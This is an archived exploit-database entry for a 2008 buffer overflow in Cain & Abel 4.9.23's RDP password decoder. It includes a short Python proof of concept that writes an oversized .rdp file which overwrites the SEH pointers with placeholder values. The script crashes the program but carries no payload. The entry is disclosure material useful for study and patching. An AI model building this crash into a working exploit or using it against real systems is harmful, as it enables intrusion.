Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC

vendor:

Cain & Abel

by:

Encrypt3d.M!nd

7.5

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: Cain & Abel

Affected Version From: 4.9.23

Affected Version To: 4.9.23

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC

When Using Remote Desktop Password Decoder in Cain and Importing '.rdp' file contains long Chars(ex:8250 chars), the Program Will crash. This Poc Will Gonna Overwrite the Pointer to next SEH With '42424242' and The SE Handler with '43434343'.

Mitigation:

Ensure that the size of the input is checked before copying it into a buffer.

Source

Exploit-DB raw data:

# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also affected)
# By:Encrypt3d.M!nd
#    encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
# Description:
# When Using Remote Desktop Password Decoder in Cain and
# Importing ".rdp" file contains long Chars(ex:8250 chars)
# The Program Will crash.And The Following Happen:
#
# EAX:41414141  ECX:7C832648  EDX:41414142  EBX:00000000
# ESP:0012BCD4  EBP:0012BCD4  ESI:001F07A8  EDI:00000001
# EIP:7E43C201 USER32.7E43C201
#
# Access violation When Reading [41414141]
#
# And Also The Pointer to next SEH record and SE Handler
# Will gonna BE Over-wrote
#
# This Poc Will Gonna Overwrite the Pointer to next SEH
# With"42424242" and The SE Handler with"43434343"
#
##########################################################
chars = "A"*8194
ptns = "B"*4
shan = "C"*4
chars2 = "A"*200

exp=open('cain.rdp','w')
exp.write(chars+ptns+shan+chars2)
exp.close()

# milw0rm.com [2008-11-30]